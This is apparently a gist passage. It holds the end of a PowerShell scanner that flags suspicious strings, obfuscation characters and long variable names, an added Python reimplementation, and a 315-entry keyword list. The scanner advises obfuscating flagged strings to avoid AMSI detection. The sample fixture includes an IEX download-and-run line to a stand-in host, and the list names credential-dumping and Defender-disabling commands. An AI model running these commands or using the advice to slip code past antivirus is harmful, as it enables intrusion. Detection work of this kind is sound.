                write-host "DetectionRate : $Conf"
                write-host "MaliciousString : " -NoNewline
                write-host "$RawStringDetection" -ForegroundColor $ColorSet
                write-host "LineNumber : $Line"
            }
        }
        Else
        {
            ## Display 'rate low,medium and high'
            If($RawStringDetection -match '.\*[^"]')
            {
                $RawStringDetection = $RawStringDetection -replace '.\*','($'
            }
            Else
            {
                $RawStringDetection = $RawStringDetection -replace '.\*','('
            }
            write-host "`nToken : $Counter"
            write-host "DetectionRate : $Conf"
            write-host "MaliciousString : " -NoNewline
            write-host "$RawStringDetection" -ForegroundColor $ColorSet
            write-host "LineNumber : $Line"
        }
        ## Logfile creation
        If($LogFile.IsPresent)
        {
            If($RateHigh.IsPresent)
            {
                ## Only store 'rate High'
                If($ColorSet -match '^(Red)$')
                {
                    echo "`nToken : $Hight" >> "$pwd\identify_offencive_tools.log"
                    echo "DetectionRate : $Conf" >> "$pwd\identify_offencive_tools.log"
                    echo "MaliciousString : $RawStringDetection" >> "$pwd\identify_offencive_tools.log"
                    echo "LineNumber : $Line`n" >> "$pwd\identify_offencive_tools.log"
                }
            }
            Else
            {
                ## Store 'rate low,medium and high'
                echo "`nToken : $Counter" >> "$pwd\identify_offencive_tools.log"
                echo "DetectionRate : $Conf" >> "$pwd\identify_offencive_tools.log"
                echo "MaliciousString : $RawStringDetection" >> "$pwd\identify_offencive_tools.log"
                echo "LineNumber : $Line`n" >> "$pwd\identify_offencive_tools.log"
            }
        }
    }
}
If($Counter -eq 0)
{
    write-host "🎖️ " -NoNewline
    write-host "congratz, cmdlet didnt find any suspicious strings inside file."
    Remove-Item -Path "$pwd\identify_offencive_tools.log" -Force
}
## Set output color based on rating
If($Counter -gt 0){$CColor = "Red"}Else{$CColor = "Green"}
If($Hight -gt 0){$SetColor = "Red"}Else{$SetColor = "Green"}
write-host "`n`n🍳 File scanning report" -ForegroundColor DarkYellow
write-host "====================================================================================="
write-host "Tokens found : " -NoNewline
write-host "$Counter" -ForegroundColor $CColor
write-host "Urgent attention : " -NoNewline
write-host "$Hight" -ForegroundColor $SetColor
write-host "File total lines : $ScriptSize"
## Invoke-CountObfuscationChars
Invoke-CountObfuscationChars
## Invoke-MaliciousVarsScan
Invoke-MaliciousVarsScan
$AllSettings = (Get-Date)
$ScanDay = $AllSettings.Day
$ScanYear = $AllSettings.Year
$DayOfTheWeek = $AllSettings.DayOfWeek
$ElapsTime = $(Get-Date) - $ScanStartTimer
$TotalTime = "{0:HH:mm:ss}" -f ([datetime]$ElapsTime.Ticks) ## Difference between scan 'start|end' (scans shorter than 24h)
Write-Host "Scan elapsed time : $TotalTime ⏱️ $ScanDay $DayOfTheWeek $ScanYear"
Write-Host "File scanned : $FileToScan"
## Recommendations
If($Hight -gt 0)
{
    write-host "`n⚙️ recomendation" -ForegroundColor DarkYellow
    write-host " Its advice to obfuscate all high rate results found [" -NoNewline
    write-host "$Hight" -ForegroundColor Red -NoNewline
    write-host "]"
    write-host " because " -NoNewline
    write-host "System.Management.Automation.Amsi" -ForegroundColor DarkYellow -NoNewline
    write-host " contains entry"
    write-host " http://bit.ly/System_Management_Automation_Engine_Runtime"
}
If(Test-Path -Path "$Env:TMP\Recomendation.log")
{
    write-host "`n⚙️ recomendation" -ForegroundColor DarkYellow
    write-host " Its advice to reduce the number of special characters"
    write-host " inside file like [" -NoNewline
    write-host "``+&'" -ForegroundColor Red -NoNewline
    write-host "] that reveal to forensics that"
    write-host " we are dealing with an heavily obfuscated file\script"
    write-host " URL: http://bit.ly/malicious-powershell-usage-detection"
}
If(Test-Path -Path "$Env:TMP\SuspiciousVars.log")
{
    write-host "`n⚙️ recomendation" -ForegroundColor DarkYellow
    write-host " Its advice to reduce the size of variable names to less than"
    write-host " 40 chars because large variable names are used in obfuscation"
}
write-host "=====================================================================================`n`n"
Remove-Item -Path "$Env:TMP\Recomendation.log" -Force
Remove-Item -Path "$Env:TMP\SuspiciousVars.log" -Force
exit
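The script above applies three heuristics to a PowerShell file: a keyword search that reports line numbers, a count of the [`+&'] obfuscation characters against a budget of 8 per line, and a check for $variable names longer than 40 characters. As an added example (not the gist's own code), the same three checks are reimplemented below in Python as a stand-alone reviewer's scanner, with one addition the gist does not make: before matching, each line is normalised to undo the two tricks visible in the gist's sample output, a backtick placed inside a token (IE`X, -vers`ion) and a string spliced from quoted fragments ('Inv'+'oke'), so the obfuscated and the plain spelling hit the same keyword entry. The keyword subset, the rate assigned to each entry and the sample script are constructed for illustration; the full list and the $HigthRate/$MediumRate classification are in the script above.

```python
"""Added example (not the gist's own code): stand-alone scanner for the three
heuristics the gist describes, plus normalisation of backtick splitting and
string splicing before keyword matching."""
import re
from collections import namedtuple

# Constructed subset of the gist's keyword list with the rate the gist's
# $HigthRate / $MediumRate classification would assign; the rest is "Low".
KEYWORDS = {
    "IEX": "Critical",
    "Invoke-Expression": "Critical",
    "AmsiScanBuffer": "Critical",
    "powershell -version 2": "Critical",
    "runas": "Critical",
    "mimikatz": "Critical",
    "while($true)": "Medium",
    "payload": "Low",
}

# Letters a backtick turns into a real escape (`n newline, `t tab, ...); a
# backtick in front of any other character is a no-op that only splits the token.
ESCAPE_LETTERS = set("0abefnrtv")
SPLICE = re.compile(r"""(['"])\s*\+\s*\1""")       # 'abc'+'def'  ->  'abcdef'
SPECIAL = re.compile(r"[`+&']")                   # the gist's [`+&'] class
VAR_ASSIGN = re.compile(r"\$([A-Za-z0-9_]+)\s*=")  # the gist's $Name= search

Hit = namedtuple("Hit", "keyword rate lines")


def normalize(line: str) -> str:
    """Drop no-op backticks and join spliced string literals."""
    out, i = [], 0
    while i < len(line):
        if line[i] == "`" and i + 1 < len(line) and line[i + 1] not in ESCAPE_LETTERS:
            i += 1          # drop the backtick, keep the character after it
            continue
        out.append(line[i])
        i += 1
    return SPLICE.sub("", "".join(out))


def scan_keywords(text: str, keywords=KEYWORDS):
    """Case-insensitive keyword search over normalised lines (1-based numbers)."""
    norm = [normalize(raw).lower() for raw in text.splitlines()]
    hits = []
    for kw, rate in keywords.items():
        lines = [n for n, line in enumerate(norm, 1) if kw.lower() in line]
        if lines:
            hits.append(Hit(kw, rate, lines))
    return hits


def special_char_stats(text: str, per_line_budget: int = 8):
    """(count, max_allowed, over_budget), computed as the gist's helper does."""
    count = len(SPECIAL.findall(text))
    max_allowed = len(text.splitlines()) * per_line_budget
    return count, max_allowed, count > max_allowed


def long_variable_names(text: str, limit: int = 40):
    """Assigned $variables whose name is longer than `limit` characters."""
    return sorted({m.group(1) for m in VAR_ASSIGN.finditer(text) if len(m.group(1)) > limit})


def scan(text: str) -> dict:
    hits = scan_keywords(text)
    count, max_allowed, over = special_char_stats(text)
    return {
        "hits": hits,
        "tokens": len(hits),
        "critical": sum(1 for h in hits if h.rate == "Critical"),
        "special_chars": count,
        "max_allowed": max_allowed,
        "over_budget": over,
        "long_vars": long_variable_names(text),
    }


# Constructed sample script (harmless; one obfuscated hit per trick).
SAMPLE = "\n".join([
    "$x = 1",
    "IE`X (New-Object Net.WebClient).DownloadString('http://example.invalid/p')",
    'powershell -vers`ion 2 -c "Get-Process"',
    "$ThisIsAnAbsurdlyLongVariableNameThatIsClearlyJustObfuscationNoise = 'Inv'+'oke-Expr'+'ession'",
    "while($true) { Start-Sleep 1 }",
])

if __name__ == "__main__":
    report = scan(SAMPLE)
    for h in report["hits"]:
        print(f"{h.rate:<9} {h.keyword!r:<25} lines {h.lines}")
    print(f"tokens={report['tokens']} critical={report['critical']} "
          f"special={report['special_chars']}/{report['max_allowed']} "
          f"long_vars={report['long_vars']}")
```

Because the gist's own matcher runs Select-String directly on the raw text, IE`X and -vers`ion would only be caught there if the list carried those exact spellings; normalising first keeps the list short and catches every backtick position. A backtick before an escape letter (`n, `t) is left alone, since PowerShell turns those into a different character and the token no longer reads the same.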
Author r00t-3xp10it commented Dec 21, 2023

List Of Malicious Strings - 315 entries
IEX
-enc
-nop
amsi
virus
keylog
trojan
cmd /c
malware
payload
revshell
mimikatz
amsi.dll
-bxor
hashdump
Add-Type
phishing
-encoded
DllImport
obfuscate
impersonate
reverseshell
ExclusionPath
reverse shell
reverse-shell
AmsiScanBuffer
invoke-mimikatz
-encodedcommand
ExclusionProcess
Invoke-Expression
lazagne.exe all
red teaming
amsiutils
amsiInitFailed
keystroke
buffer overflow
bruteforce
redteam
red team
shellcode
fileless
privesc
escalate privileges
password guessing
guess login
credential dump
password spraying
password spray
cleartext passwords
remote execution
creds dump
credentials dump
pass the hash
pass-the-hash
golden ticket
dumping the lsass
dumping lsass
dump lsass
cached credentials
lsa secrets
crypto::scauth
impersonating user
impersonate user
impacket
lsass dump
procdump
obfuscated
obfuscation
pwdump
command and control
dropper
web shell
webshell
kerberos relay
spoofing
elevate privilege
abuse elevation
bypass uac
uac bypass
access token manipulation
token impersonation
token theft
evade process-monitoring
bypass password
victim ip
sniffing
poisoning
elevate process privileges
elevate its privileges
bypass user account control
powershell -ep bypass
powershell -executionpolicy bypass
Rubeus.exe dump
exploit
keylogger
sniffer
password crack
password hacking
password breach
password attack
password stealer
bypass antivirus
brute force
remote access
password hashing
code injection
keystroke logging
keylogging
password sniffing
cipher
cookie stealing
password cracking
encryption
privilege escalation
key logging
password harvesting
eavesdropping
brute-forcing
cookie theft
reflection attack
crypto attack
smurfing
ping of death
credential theft
keylogger installation
hashing
fileless attack
impersonation
fileless malware
payload delivery
antivirus evasion
data obfuscation
ldap injection
decryption
DefineDynamicAssembly
DefineDynamicModule
DefineType
DefineConstructor
CreateType
DefineLiteral
DefineEnum
DefineField
ILGenerator
Emit
UnverifiableCodeAttribute
DefinePInvokeMethod
GetTypes
GetAssemblies
Methods
GetConstructor
GetConstructors
GetDefaultMembers
GetEvent
GetEvents
GetField
GetFields
GetInterface
GetInterfaceMap
GetInterfaces
GetMember
GetMembers
GetMethod
GetMethods
GetNestedType
GetNestedTypes
GetProperties
GetProperty
InvokeMember
MakeArrayType
MakeByRefType
MakeGenericType
MakePointerType
DeclaringMethod
DeclaringType
ReflectedType
TypeHandle
TypeInitializer
UnderlyingSystemType
InteropServices
AllocHGlobal
PtrToStructure
StructureToPtr
FreeHGlobal
IntPtr
MemoryStream
DeflateStream
FromBase64String
EncodedCommand
Bypass
ToBase64String
ExpandString
GetPowerShell
OpenProcess
VirtualAlloc
VirtualFree
WriteProcessMemory
CreateUserThread
CloseHandle
GetDelegateForFunctionPointer
kernel32
CreateThread
memcpy
LoadLibrary
GetModuleHandle
GetProcAddress
VirtualProtect
FreeLibrary
ReadProcessMemory
CreateRemoteThread
AdjustTokenPrivileges
WriteByte
WriteInt32
OpenThreadToken
PtrToString
ZeroFreeGlobalAllocUnicode
OpenProcessToken
GetTokenInformation
SetThreadToken
ImpersonateLoggedOnUser
RevertToSelf
GetLogonSessionData
CreateProcessWithToken
DuplicateTokenEx
OpenWindowStation
OpenDesktop
MiniDumpWriteDump
AddSecurityPackage
EnumerateSecurityPackages
GetProcessHandle
DangerousGetHandle
GetAsyncKeyState
KeyboardState
GetForegroundWindow
BindingFlags
NonPublic
ScriptBlockLogging
LogPi2pelineExecutionDetails
ProtectedEventLogging
while($true)
powershell -version 2
SetValue($null$true)
.Write($st0$st.Length)
schtasks /create
Set-MpPreference
AlwaysInstallElevated
runas
Add-Exfiltration
Add-Persistence
Add-RegBackdoor
Add-ScrnSaveBackdoor
Enabled-DuplicateToken
Get-Keystrokes
LSASecret
Get-PassHash
Get-RegAlwaysInstallElevated
Get-Screenshot
Get-ServiceUnquoted
Get-System
Get-Vedential
Invoke-BypassUAC
Invoke-DllInjection
Invoke-Mimikittenz
Invoke-PSInject
Invoke-PsExec
Invoke-RunAs
Invoke-WScriptBypassUAC
Out-Minidump
AmsiBypass
nishang
Invoke-ShellCommand
-dumpcr
SeImpersonate
SeDebugPrivilege
crackmapexec
lsadump::sam
SEKURLSA::Pth
kerberos::ptt
kerberos::golden
sekurlsa::minidump
sekurlsa::logonPasswords
token::elevate
invoke-command
rundll32
certutil
mshta
wevtutil.exe cl
ShellExecute
sc stop WinDefend
Remove-MpThreat
sc stop Sense
amsi_disable
lsass.exe
wevtutil cl
amsicontext
/savecred
nc.exe
DumpSAM
Dump-SAM
S-1-5-32-544
-ScriptBlock
impersonateuser:
.downloadstring
ExclusionExtension
sekurlsa::tickets
system.net.webclient
MiniDumpWithHandleData
RealTimeProtectionEnabled
MiniDumpWithProcessThreadData
Invoke-WebRequest ("{0}?url={1}" -f
System.Management.Automation.
-DisableIOAVProtection $true
-DisableRealtimeProtection $true
-DisableRealtimeMonitoring $true
System.Runtime.InteropServices.Marshal
HKLM:\SOFTWARE\Microsoft\AMSI\Providers
MpCmdRun.exe -RemoveDefinitions -All
-DisableIntrusionPreventionSystem $true